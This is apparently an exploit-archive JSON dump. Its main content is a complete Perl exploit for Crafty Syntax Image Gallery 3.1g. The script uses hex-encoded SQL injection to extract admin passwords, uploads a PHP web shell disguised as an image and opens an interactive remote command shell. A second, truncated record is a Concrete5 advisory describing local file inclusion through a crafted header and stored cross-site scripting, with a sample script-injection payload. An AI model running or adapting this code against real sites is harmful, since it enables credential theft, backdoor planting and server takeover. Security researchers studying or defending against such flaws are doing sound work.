{"type": "zdt", "lastseen": "2016-04-20T00:13:49", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Crafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit", "published": "2006-04-04T00:00:00", "href": "http://0day.today/exploit/description/336", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for unknown platform in category web applications", "hash": "c34c76ec941663c0401f5340232fdc68758dd743b28acb537e1c4bc241a330a9", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "=================================================================\r\nCrafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit\r\n=================================================================\r\n\r\n\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n###############################################################################\r\n# This program is free software; you can redistribute it and/or\r\n# modify it under the terms of the GNU General Public License\r\n# as published by the Free Software Foundation; either version 2\r\n# of the License, or (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n###############################################################################\r\n\r\n# =====================================================\r\n# $ crappy_syntax.pl localhost/csig/ 80\r\n#\r\n# :: crafty syntax image gallery <= 3.1g\r\n# :: by undefined1_ @ bash-x.net/undef/\r\n# :: note: this works only on mysql >= 4.0\r\n#\r\n#\r\n# [+] creating user account\r\n# [+]\t\tuser: 98fe56123\r\n#\t\t\tpassword: 7652L4M3l39q\r\n#\t\t\temail: SehswdSx0E@hotmail.com\r\n# [+] user '98fe56123' with password '7652L4M3l39q' registered\r\n# [+] logged in as 98fe56123\r\n# [+] projectid is 2\r\n# [-] no admin found for this projectid, trying the username 'admin'\r\n# [+] admin username: 'admin'\r\n# [+] admin password: '1111'\r\n# [+] logged in as 'admin'\r\n# [+] getting shell location\r\n# [+] shell @ 'userimages/1/18d76bcbc6f2.php'\r\n# [+] have phun?\r\n#\r\n# localhost$ uname\r\n# Linux\r\n# localhost$ whoami\r\n# nobody\r\n# =====================================================\r\n\r\nuse strict; \r\nuse IO::Socket;\r\n\r\n$| = 1;\r\nprint \":: crafty syntax image gallery <= 3.1g\\n\";\r\nprint \":: by undefined1_ @ bash-x.net/undef/\\n\";\r\nprint \":: note: this works only on mysql >= 4.0\\n\\n\\n\";\r\n\r\nmy $website = shift || usage();\r\nmy $port = shift || usage();\r\nmy $user = shift;\r\nmy $password = shift;\r\nmy $location = shift;\r\n\r\n\r\n\r\nmy $path = \"/\";\r\nmy $server = $website;\r\nif(index($website, \"/\") != -1)\r\n{\r\n\t$path = substr($website, index($website, \"/\"));\r\n\t$server = substr($website, 0, index($website, \"/\"));\r\n\tif(substr($path, length($path)-1) ne \"/\")\r\n\t{\r\n\t\t$path .= \"/\";\r\n\t}\r\n}\r\nif($location eq \"\")\r\n{\r\n\tif($user eq \"\" && $password eq \"\")\r\n\t{\r\n\t\tprint \"[+] creating user account\\n\";\r\n\t\t$user = randstring(8,12);\r\n\t\t$password = randstring(8,12);\r\n\t\tmy $email = randstring(8,12).\"\\@hotmail.com\";\r\n\t\tprintf(\"[+]\\tuser: %s\\n\", $user);\r\n\t\tprintf(\"\\tpassword: %s\\n\", $password);\r\n\t\tprintf(\"\\temail: %s\\n\", $email);\r\n\t\tregister($server, $path, $user, $user, $password, $email);\r\n\t}\r\n\r\n\tmy $cookies = login($server, $port, $path, $user, $password);\r\n\tmy $projectid = get_projectid($server, $port, $path, $cookies);\r\n\tmy @admin = send_payload($server, $port, $path, $cookies, $projectid);\r\n\r\n\t$cookies = login($server, $port, $path, $admin[0], $admin[1]);\r\n\tupload_shell($server, $port, $path, $cookies, $projectid);\r\n\t$location = get_shell_location($server,$port,$path,$cookies);\r\n}\r\n\r\ncheck_shell($server, $port, $path, $location);\r\nprintf(\"[+] have phun?\\n\\n\");\r\nmy $command;\r\nwhile(1) \r\n{\r\n\tprint $server.\"\\$ \";\r\n\twhile(<STDIN>) \r\n\t{\r\n\t\t$command = $_;\r\n\t\tchomp($command);\r\n\t\tlast;\r\n\t}\r\n\tdo_shell($server,$port,$path,$location,$command);\r\n}\r\n\r\n\r\nsub send_payload(\\$,\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $cookies = shift;\r\n\tmy $projectid = shift;\r\n\tmy $shellcode;\r\n\r\n\t$shellcode = \"\\x61\\x6e\\x64\\x20\\x31\\x3d\\x30\\x20\\x75\\x6e\\x69\\x6f\\x6e\\x20\";\r\n\t$shellcode .= \"\\x61\\x6c\\x6c\\x20\\x73\\x65\\x6c\\x65\\x63\\x74\\x20\\x31\\x2c\\x32\";\r\n\t$shellcode .= \"\\x2c\\x33\\x2c\\x34\\x2c\\x35\\x2c\\x75\\x73\\x65\\x72\\x69\\x64\\x20\";\r\n\t$shellcode .= \"\\x61\\x73\\x20\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6f\\x6e\";\r\n\t$shellcode .= \"\\x2c\\x37\\x2c\\x38\\x2c\\x39\\x2c\\x30\\x2c\\x31\\x2c\\x32\\x2c\\x33\";\r\n\t$shellcode .= \"\\x2c\\x34\\x2c\\x35\\x2c\\x35\\x20\\x66\\x72\\x6f\\x6d\\x20\\x67\\x61\";\r\n\t$shellcode .= \"\\x6c\\x6c\\x65\\x72\\x79\\x5f\\x61\\x63\\x63\\x65\\x73\\x73\\x20\\x77\";\r\n\t$shellcode .= \"\\x68\\x65\\x72\\x65\\x20\\x67\\x61\\x6c\\x6c\\x65\\x72\\x79\\x69\\x64\";\r\n\t$shellcode .= \"\\x3d\";\r\n\t$shellcode .= $projectid;\r\n\t$shellcode .= \"\\x20\\x61\\x6e\\x64\\x20\\x70\\x65\\x72\\x6d\\x69\\x73\\x73\\x69\\x6f\";\r\n\t$shellcode .= \"\\x6e\\x73\\x3d\\x43\\x4f\\x4e\\x43\\x41\\x54\\x28\\x30\\x78\\x34\\x36\";\r\n\t$shellcode .= \"\\x35\\x35\\x34\\x63\\x34\\x63\\x29\\x20\\x2d\\x2d\";\r\n\r\n\tmy $query = \"GET \".$path.\"slides.php?limitquery_s=\".urlEncode($shellcode).\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data !~ /photo_captions\\[1\\] = \"/)\r\n\t{\r\n\t\tprint \"[-] no admin found for this projectid, trying the username 'admin'\\n\";\r\n\t\t$shellcode = \"and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where username=CONCAT(0x61646d696e) --\";\r\n\t\t$query = \"GET \".$path.\"slides.php?limitquery_s=\".urlEncode($shellcode).\" HTTP/1.1\\r\\n\";\r\n\t\t$query .= \"Host: $server\\r\\n\";\r\n\t\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t\t$query .= \"Connection: close\\r\\n\";\r\n\t\t$query .= $cookies;\r\n\t\t$query .= \"\\r\\n\";\r\n\t\tmy $data = sendpacket($server, $port, $query);\r\n\t\tif($data !~ /photo_captions\\[1\\] = \"/ || $data !~ /photo_urls\\[1\\] = \"/)\r\n\t\t{\r\n\t\t\tprint \"[-] exploit failed\\n\";\r\n\t\t\texit;\r\n\t\t}\r\n\t\tmy $index1 = index($data, \"photo_captions[1] = \\\" \") + 22;\r\n\t\tmy $index2 = index($data, \"\\\"\", $index1);\r\n\t\tmy $passwd = substr($data, $index1, $index2-$index1);\r\n\r\n\t\t$index1 = index($data, \"photo_urls[1] = \\\"\") + 17;\r\n\t\t$index2 = index($data, \"\\\"\", $index1);\r\n\t\t$data = substr($data, $index1, $index2-$index1);\r\n\t\t$index1 = rindex($data, \"/\") + 1;\r\n\t\tmy $username = substr($data, $index1);\r\n\r\n\r\n\t\tprint \"[+] admin username: '$username'\\n\";\r\n\t\tprint \"[+] admin password: '$passwd'\\n\";\r\n\r\n\t\tmy @ret;\r\n\t\tpush(@ret, $username);\r\n\t\tpush(@ret, $passwd);\r\n\t\treturn @ret;\r\n\t}\r\n\tmy $index1 = index($data, \"photo_captions[1] = \\\" \") + 22;\r\n\tmy $index2 = index($data, \"\\\"\", $index1);\r\n\tmy $uid = substr($data, $index1, $index2-$index1);\r\n\tprint \"[+] admin uid: '$uid'\\n\";\r\n\r\n\r\n\r\n\r\n\r\n\t$shellcode = \"and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where recno=\".$uid.\" --\";\r\n\t$query = \"GET \".$path.\"slides.php?limitquery_s=\".urlEncode($shellcode).\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data !~ /photo_captions\\[1\\] = \"/ || $data !~ /photo_urls\\[1\\] = \"/)\r\n\t{\r\n\t\tprint \"[-] exploit failed (mysql < 4 ?)\\n\";\r\n\t\texit;\r\n\t}\r\n\t$index1 = index($data, \"photo_captions[1] = \\\" \") + 22;\r\n\t$index2 = index($data, \"\\\"\", $index1);\r\n\tmy $passwd = substr($data, $index1, $index2-$index1);\r\n\r\n\t$index1 = index($data, \"photo_urls[1] = \\\"\") + 17;\r\n\t$index2 = index($data, \"\\\"\", $index1);\r\n\t$data = substr($data, $index1, $index2-$index1);\r\n\t$index1 = rindex($data, \"/\") + 1;\r\n\tmy $username = substr($data, $index1);\r\n\r\n\r\n\tprint \"[+] admin username: '$username'\\n\";\r\n\tprint \"[+] admin password: '$passwd'\\n\";\r\n\r\n\tmy @ret;\r\n\tpush(@ret, $username);\r\n\tpush(@ret, $passwd);\r\n\treturn @ret;\r\n}\r\n\r\n\r\nsub do_shell(\\$,\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $location = shift;\r\n\tmy $command = shift;\r\n\r\n\tmy $d = \"c=\".$command;\r\n\tmy $query = \"POST \".$path.$location.\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= \"Content-Length: \".length($d).\"\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\t$query .= $d;\r\n\t\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tmy $index = index($data, \"\\r\\n\\r\\n\");\r\n\tif($index >= 0)\r\n\t{\r\n\t\tprint substr($data, $index+4).\"\\n\";\r\n\t}\r\n\telse\r\n\t{\r\n\t\tprint \"[-] shell error?\\n\";\r\n\t}\r\n}\r\n\r\nsub check_shell(\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $location = shift;\r\n\r\n\t\r\n\tmy $query = \"GET \".$path.$location.\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\r\n\tif($data !~ /HTTP\\/1.1 200 OK/)\r\n\t{\r\n\t\tprint \"[-] shell not found\\n\";\r\n\t\tprint \"[-] try \".$server.$path.\"/userimages/\\n\";\r\n\t\texit;\r\n\t}\r\n}\r\n\r\nsub get_shell_location(\\$,\\$,\\$,\\$) {\t\r\n\tprint \"[+] getting shell location\\n\";\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $cookies = shift;\r\n\tmy $shellcode;\r\n\r\n\t$shellcode = \"\\x61\\x6e\\x64\\x20\\x69\\x6d\\x61\\x67\\x65\\x20\\x4c\\x49\\x4b\\x45\\x20\\x43\";\r\n\t$shellcode .= \"\\x4f\\x4e\\x43\\x41\\x54\\x28\\x30\\x78\\x32\\x35\\x32\\x65\\x37\\x30\\x36\\x38\";\r\n\t$shellcode .= \"\\x37\\x30\\x29\\x20\\x6f\\x72\\x64\\x65\\x72\\x20\\x62\\x79\\x20\\x72\\x65\\x63\";\r\n\t$shellcode .= \"\\x6e\\x6f\\x20\\x64\\x65\\x73\\x63\\x20\\x6c\\x69\\x6d\\x69\\x74\\x20\\x31\\x20\";\r\n\t$shellcode .= \"\\x2d\\x2d\";\r\n\r\n\t\r\n\tmy $query = \"GET \".$path.\"slides.php?limitquery_s=\".urlEncode($shellcode).\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data =~ /There are no photos in this gallery/)\r\n\t{\r\n\t\tprint \"[-] shell not found\\n\";\r\n\t\tprint \"[-] try \".$server.$path.\"/userimages/\\n\";\r\n\t\texit;\r\n\t}\r\n\r\n\tmy $index1 = index($data, \"photo_urls[1] = \\\"\") + 17;\r\n\tmy $index2 = index($data, \"\\\"\", $index1);\r\n\tmy $location = substr($data, $index1, $index2-$index1);\r\n\tprint \"[+] shell @ '\".$location.\"'\\n\";\r\n\treturn $location;\r\n}\r\n\r\nsub get_projectid(\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $cookies = shift;\r\n\t\r\n\tmy $query = \"GET \".$path.\"imagemenu.php?html=menu.tpl HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tmy $projectid;\r\n\tif($data =~ /\\?projectid=([0-9]*)/)\r\n\t{\r\n\t\t$projectid = $1;\r\n\t}\r\n\telse\r\n\t{\r\n\t\tprint \"[-] no projectid found\";\r\n\t\texit;\r\n\t}\r\n\r\n\tprint \"[+] projectid is '$projectid'\\n\";\r\n\treturn $projectid;\r\n}\r\n\r\nsub upload_shell(\\$,\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $cookies = shift;\r\n\tmy $projectid = shift;\r\n\t\r\n\tmy $query = \"GET \".$path.\"newimage.php?projectid=\".$projectid.\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data =~ /Access denied.../)\r\n\t{\r\n\t\tprint \"[-] no admin privileges (mysql < 4.0 ?)\\n\";\r\n\t\texit;\r\n\t}\r\n\r\n\tmy $shell = \"<? if(isset(\\$_POST['c'])) { system(\\$_POST['c']); } ?>\";\r\n\r\n\tmy $boundary = \"-----------------------------220162907215434\";\r\n\tmy $post = \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"projectid\\\"\\r\\n\\r\\n\";\r\n\t$post .= $projectid.\"\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"A_MONTH\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"03\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"A_DAY\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"26\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"A_YEAR\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"2006\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"fullimage\\\"; filename=\\\"my_image.jpg\\\"\\r\\n\";\r\n\t$post .= \"Content-Type: text/plain\\r\\n\\r\\n\";\r\n\t$post .= $shell.\"\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"description\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"another image\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"ext\\\"\\r\\n\\r\\n\";\r\n\t$post .= \".php\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"feature__\".$projectid.\"\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"Y\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"addnow\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"ADD\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"--\\r\\n\";\r\n\r\n\tmy $query = \"POST \".$path.\"newimage.php?projectid=\".$projectid.\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Content-Type: multipart/form-data; boundary=\".$boundary.\"\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"Content-Length: \".length($post).\"\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\t$query .= $post;\r\n\r\n\tsendpacket($server, $port, $query);\r\n}\r\n\r\nsub login(\\$,\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $username = shift;\r\n\tmy $password = shift;\r\n\r\n\tmy $d = \"whattodo=login&myusername=\".$username.\"&mypassword=\".$password;\r\n\tmy $query = \"POST \".$path.\"index.php HTTP/1.1\\r\\n\";\r\n\t$query .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= \"Content-Length: \".length($d).\"\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\t$query .= $d;\r\n\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data =~ /<td><b>Your Name:<\\/td><td><input type=text name=myusername/ || $data !~ /Set-Cookie: /)\r\n\t{\r\n\t\tprint \"[-] failed to login\\n\";\r\n\t\texit;\r\n\t}\r\n\t\r\n\tmy $cookies = \"\";\t# chocolate cookies\r\n\tmy $index1 = index($data, \"\\r\\n\\r\\n\");\r\n\tif($index1 >= 0)\r\n\t{\r\n\t\tmy $index2 = index($data, \"Set-Cookie: \") + 12;\r\n\t\tmy $index3 = index($data, \"\\r\\n\", $index2);\r\n\t\t$cookies = \"Cookie: \".substr($data, $index2, $index3-$index2+2);\r\n\t}\r\n\t\r\n\tprint \"[+] logged in as '$username'\\n\";\r\n\treturn $cookies;\r\n}\r\n\r\nsub register(\\$, \\$, \\$, \\$, \\$, \\$, \\$) {\r\n\tmy $server = shift;\r\n\tmy $path = shift;\r\n\tmy $name = shift;\r\n\tmy $user = shift;\r\n\tmy $password = shift;\r\n\tmy $email = shift;\r\n\r\n\tmy $d = \"action=register&emailadd=\".$email.\"&newname=\".$name.\"&newusername=\".$user.\"&newpassword=\".$password;\r\n\tmy $query = \"POST \".$path.\"lostsheep.php HTTP/1.1\\r\\n\";\r\n\t$query .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= \"Content-Length: \".length($d).\"\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\t$query .= $d;\r\n\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data =~ /<li>Sorry the username you entered <b><\\/b> is already taken.. try again/)\r\n\t{\r\n\t\tprint \"[-] failed: username taken\\n\";\r\n\t\texit;\r\n\t}\r\n\tif($data =~ /you did not enter in a/)\r\n\t{\r\n\t\tprint \"[-] failed\\n\";\r\n\t\texit;\r\n\t}\r\n\tprint \"[+] user '$user' with password '$password' registered\\n\";\r\n}\r\n\r\nsub sendpacket(\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $request = shift;\r\n\r\n\tmy $sock = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => $server, PeerPort => $port) or die \"[-] Could not connect to $server:$port $!\\n\";\r\n\tprint $sock \"$request\";\r\n\r\n\t\r\n\tmy $data = \"\";\r\n\tmy $answer;\r\n\twhile($answer = <$sock>)\r\n\t{\r\n\t\t$data .= $answer;\r\n\t}\r\n\t\r\n\tclose($sock);\r\n\treturn $data;\r\n}\r\n\r\nsub randstring(\\$,\\$) {\r\n\tmy $min = shift;\r\n\tmy $max = shift;\r\n\r\n\tmy $length = int( (rand(65535)%($max-$min+1))+$min);\r\n\tmy $ret = \"\";\r\n\tfor(my $i = 0; $i < $length; $i++)\r\n\t{\r\n\t\tmy $w = int(rand(3));\r\n\t\tif($w == 0)\r\n\t\t{\r\n\t\t\t$ret .= chr(97 + int(rand(26)));\r\n\t\t}\r\n\t\telsif($w == 1)\r\n\t\t{\r\n\t\t\t$ret .= chr(65 + int(rand(26)));\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t$ret .= chr(48 + int(rand(10)));\r\n\t\t}\r\n\t}\r\n\r\n\treturn $ret;\r\n}\r\n\r\n\r\nsub usage() {\r\n\tprintf \"usage: %s <website> <port> [user(optional)] [password(optional)] [shell path without trailing / (optional)]\\n\", $0;\r\n\tprintf \"exemple: %s www.site.com/csig/ 80\\n\", $0;\r\n\texit;\r\n}\r\n\r\n\r\nsub urlEncode {\r\n my ($string) = @_;\r\n $string =~ s/(\\W)/\"%\" . unpack(\"H2\", $1)/ge;\r\n return $string;\r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-336", "sourceHref": "http://0day.today/exploit/336", "modified": "2006-04-04T00:00:00", "reporter": "undefined1_", "enchantments": {"vulnersScore": 6.4}}

{"result": {"zdt": [{"lastseen": "2016-07-01T01:01:41", "references": [], "edition": 1, "description": "Exploit for php platform in category web applications", "reporter": "EgiX", "published": "2016-06-30T00:00:00", "title": "Concrete5 5.7.3.1 - Multiple Vulnerabilities", "type": "zdt", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-06-30T00:00:00", "href": "http://0day.today/exploit/description/25604", "id": "1337DAY-ID-25604", "sourceData": "-------------------------------------------------------------------------------\r\nConcrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability\r\n-------------------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttps://www.concrete5.org/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 5.7.3.1 and probably other versions.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located within the \"Application::dispatch()\" method:\r\n\r\n326. public function dispatch(Request $request)\r\n327. {\r\n328. if ($this->installed) {\r\n329. $response = $this->getEarlyDispatchResponse();\r\n330. }\r\n331. if (!isset($response)) {\r\n332. $collection = Route::getList();\r\n333. $context = new \\Symfony\\Component\\Routing\\RequestContext();\r\n334. $context->fromRequest($request);\r\n335. $matcher = new UrlMatcher($collection, $context);\r\n336. $path = rtrim($request->getPathInfo(), '/') . '/';\r\n337. try {\r\n338. $request->attributes->add($matcher->match($path));\r\n339. $matched = $matcher->match($path);\r\n340. $route = $collection->get($matched['_route']);\r\n341. Route::setRequest($request);\r\n342. $response = Route::execute($route, $matched);\r\n\r\nThe vulnerability exists because the path for the incoming request is retrieved using the\r\n\"Request::getPathInfo()\" method from the Symfony framework, which allows to specify the path\r\nfor the request within some HTTP headers (like \"X-Original-URL\" and some others). So, it might\r\nbe possible to specify paths containing \"dot-dot-slash\" sequences without worrying about URL\r\nencoding and path normalization done by the web server. This could be exploited by unauthenticated\r\nattackers to include arbitrary .php files located outside the Concrete5 root directory or from the\r\nConcrete5 codebase itself (potentially leading to unauthorized access to certain functionalities)\r\nby sending an HTTP request like this:\r\n\r\nGET /concrete5/index.php HTTP/1.1\r\nHost: localhost\r\nX-Original-Url: /tools/../../index\r\nConnection: keep-alive\r\n\r\nThe dispatching process for this request will try to re-include the index.php file,\r\nand this will end up with an unexpected error.\r\n\r\n-------------------------------------------------------------------------\r\nConcrete5 <= 5.7.3.1 Multiple Stored Cross-Site Scripting Vulnerabilities\r\n-------------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttps://www.concrete5.org/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 5.7.3.1 and probably other versions.\r\n\r\n\r\n[-] Vulnerabilities Description:\r\n\r\n1) User input passed through the \"uEmail\" and \"uDefaultLanguage\" POST parameters when registering\r\na new account is not properly sanitized before being used to generate HTML output. This can be\r\nexploited by unauthenticated attackers to permanently store arbitrary script code within the Users\r\ndatabase table, which might be executed by an authenticated user while browsing to the users page.\r\n\r\nNOTE: the \"uDefaultLanguage\" parameter cannot be longer than 32 characters, however this can\r\nstill be exploited by e.g. using a URL shortener service to include arbitrary script code (such\r\nas <script src=//v.ht/x_s></script> which is exactly 32 characters).\r\n\r\n2) The vulnerable code is located in /concrete/controllers/single_page/dashboard/system/registration/open.php:\r\n\r\n13. public function update_registration_type()\r\n14. {\r\n15. if ($this->isPost()) {\r\n16. Config::save('concrete.user.registration.email_registration', ($this->post('email_as_username') ? true : false));\r\n17. Config::save('concrete.user.registration.type', $this->post('registration_type'));\r\n18. Config::save('concrete.user.registration.captcha', ($this->post('enable_registration_captcha')) ? true : false);\r\n19. switch ($this->post('registration_type')) {\r\n20. case \"enabled\":\r\n21. Config::save('concrete.user.registration.enabled', true);\r\n22. Config::save('concrete.user.registration.validate_email', false);\r\n23. Config::save('concrete.user.registration.approval', false);\r\n24. Config::save('concrete.user.registration.notification', $this->post('register_notification'));\r\n25. Config::save(\r\n26. 'concrete.user.registration.notification_email',\r\n27. Loader::helper('security')->sanitizeString(\r\n28. $this->post('register_notification_email')));\r\n\r\nUser input passed through the \"register_notification_email\" POST parameter is not properly sanitized\r\nbefore being stored into a configuration setting (the \"sanitizeString()\" method strips tags from the\r\nstring but not double quotes). This can be exploited by an authenticated attacker to permanently\r\nstore arbitrary script code within the database, which might be executed by another user while\r\nbrowsing to the \"Public Registration Settings\" page.\r\n\r\nNOTE: the vulnerability can be exploited only by authenticated users, however an attacker\r\ncan leverage a CSRF vulnerability related to the \"Public Registration Settings\" page.\r\n\r\n3) The vulnerable code is located in /concrete/controllers/single_page/dashboard/system/registration/profiles.php:\r\n\r\n11. public function update_profiles() {\r\n12. if ($this->isPost()) {\r\n13. Config::save('concrete.user.profiles_enabled', ($this->post('public_profiles')?true:false));\r\n14. Config::save('concrete.user.gravatar.enabled', ($this->post('gravatar_fallback')?true:false));\r\n15. Config::save('concrete.user.gravatar.max_level', Loader::helper('security')->sanitizeString($this->post('gravatar_max_level')));\r\n16. Config::save('concrete.user.gravatar.image_set', Loader::helper('security')->sanitizeString($this->post('gravatar_image_set')));\r\n17. // $message = ($this->post('public_profiles')?t('Public profiles have been enabled'):t('Public profiles have been disabled.'));\r\n18. if($this->post('public_profiles')) {\r\n19. $this->redirect('/dashboard/system/registration/profiles/profiles_enabled');\r\n\r\nUser input passed through the \"gravatar_max_level\" e \"gravatar_image_set\" POST parameters is not\r\nproperly sanitized before being stored into a configuration setting (the \"sanitizeString()\" method\r\nstrips tags from the string but not double quotes). This can be exploited by an authenticated attacker\r\nto permanently store arbitrary script code within the database, which might be executed by another\r\nuser while browsing to the \"Public Profiles Settings\" page.\r\n\r\nNOTE: the vulnerability can be exploited only by authenticated users, however an attacker\r\ncan leverage a CSRF vulnerability related to the \"Public Profiles Settings\" page.\r\n\r\n4) The vulnerable code is located in /concrete/controllers/single_page/dashboard/users/points/actions.php:\r\n\r\n94. public function save()\r\n95. {\r\n96. if($this->post('upaID') > 0) {\r\n97. $this->upa->load($this->post('upaID'));\r\n98. if (!$this->upa->hasCustomClass()) {\r\n99. $this->upa->upaHandle = $this->post('upaHandle');\r\n100. }\r\n101. $this->upa->upaName = $this->post('upaName');\r\n102. $this->upa->upaDefaultPoints = $this->post('upaDefaultPoints');\r\n103. $this->upa->gBadgeID = $this->post('gBadgeID');\r\n104. if 